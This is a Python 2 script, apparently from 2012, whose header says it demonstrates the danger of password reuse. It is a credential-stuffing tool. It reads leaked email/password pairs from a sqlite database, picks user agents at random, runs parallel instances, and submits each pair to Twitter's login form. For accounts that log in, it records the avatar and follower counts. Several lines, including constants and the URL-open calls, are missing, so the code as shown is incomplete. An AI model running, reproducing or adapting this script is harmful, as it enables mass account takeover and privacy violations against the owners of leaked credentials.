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- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- #
- # $Header: //depot/reusable/ $
- # $Date: 2012/04/12 $
- #
- # - A script that attempts to reuse given list of email/password combinations to login into other sites to demonstrate the danger of password reuse.
- # This script requires mechanize ( to be installed.
- #
- # See for more details.
- #
- # 2012 (C) Dazzlepod
- #
- import cookielib
- import mechanize
- import os
- import random
- import re
- import socket
- import sqlite3
- import urllib2
- from datetime import datetime
- # sqlite3 database with a table called accounts created using CREATE TABLE accounts (email TEXT, password TEXT, data TEXT);
- # You will need to populate this database with your list of email/password combinations; the data field should be left empty
- DATABASE = 'accounts.db'
- # Limit up to this number of instances of this script to run concurrently at any one time; ll of them will access the same sqlite3 database, accounts.db
- # Set this to the appropriate value depending on the number of entries you have in accounts.db
- # Useful to timeout hanged mechanize requests
- # Random list of HTTP user agents to be used by mechanize when sending requests
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7',
- 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
- ]
- # Process ID for this instance; to be written into semaphore file
- pid = os.getpid()
- # Creates log and semaphore file for this instance
- index = 1
- instance_id = 0
- while index <= MAX_INSTANCES:
- if not os.path.exists('%d.sem' % index):
- instance_id = index
- break
- index += 1
- if instance_id > 0:
- log = open('%d.log' % instance_id, 'w', 0)
- sem = open('%d.sem' % instance_id, 'w')
- sem.write('%s' % pid)
- sem.close()
- print '[%s] [%d] starting' % (, instance_id)
- else:
- exit(0)
- # Default timeout is 5.0 seconds; higher value is required in order to run multiple instances of this script
- conn = sqlite3.connect(DATABASE, timeout = 60.0)
- # Always return bytestrings
- conn.text_factory = str
- cur = conn.cursor()
- query = "SELECT rowid, email, password FROM accounts WHERE data = '' ORDER BY RANDOM() LIMIT %d" % ACCOUNTS_PER_INSTANCE
- cur.execute(query)
- accounts = cur.fetchall()
- total_accounts = len(accounts)
- index = 0
- passed = 0
- socket.setdefaulttimeout(SOCKET_TIMEOUT)
- # From here on, output will be written into the log file for this instance
- for account in accounts:
- index += 1
- (rowid, email, password) = account
- print >>log, '[%s] [%d / %d | passed = %d] email=%s' % (, index, total_accounts, passed, email)
- br = mechanize.Browser()
- cj = cookielib.LWPCookieJar()
- br.set_cookiejar(cj)
- br.addheaders = [
- ('User-Agent', '%s' % USER_AGENTS[random.randrange(0, len(USER_AGENTS))]),
- ('Referer', ''),
- ]
- # Attempts to login into Twitter
- try:
- except urllib2.URLError:
- print >>log, '\t[EXCEPTION] opening URL (%s)' % email
- continue
- except socket.timeout:
- print >>log, 'Connection timed out'
- break
- # Twitter-specific login form
- try:
- br.select_form(nr=2)
- except Exception:
- print >>log, '\t[EXCEPTION] selecting form (%s)' % email
- continue
- br.form["session[username_or_email]"] = email
- br.form["session[password]"] = password
- try:
- br.submit()
- except Exception:
- print >>log, '\t[EXCEPTION] submit form (%s)' % email
- continue
- page = ''
- page = br.response().read()
- # Twitter-specific first page after successful login
- if '/logout' in page:
- # We want to store URL to the personalized avatar
- try:
- avatar = re.findall('class="avatar size32" src="(?P<avatar>.*?)"', page)[0]
- except IndexError:
- continue
- if 'default_profile_images' in avatar:
- avatar = ''
- # We want to get the number of followers and number of people being followed by this account
- following = int(re.findall('data-element-term="following_stats"><strong>(?P<following>.*?)</strong>', page)[0].replace(',', ''))
- followers = int(re.findall('data-element-term="follower_stats"><strong>(?P<followers>.*?)</strong>', page)[0].replace(',', ''))
- data = '{"avatar": "%s", "following": "%d", "followers": "%d"}' % (avatar, following, followers)
- cur.execute('UPDATE accounts SET data = ? WHERE rowid = ?', (data, rowid,))
- print >>log, '\t[PASSED] %s %s' % (email, data)
- passed += 1
- else:
- # Remove this account from accounts.db if login failed
- cur.execute('DELETE FROM accounts WHERE rowid = ?', (rowid,))
- print >>log, '\t[FAILED] %s' % email
- conn.commit()
- cur.close()
- os.remove('%d.sem' % instance_id)
- log.close()
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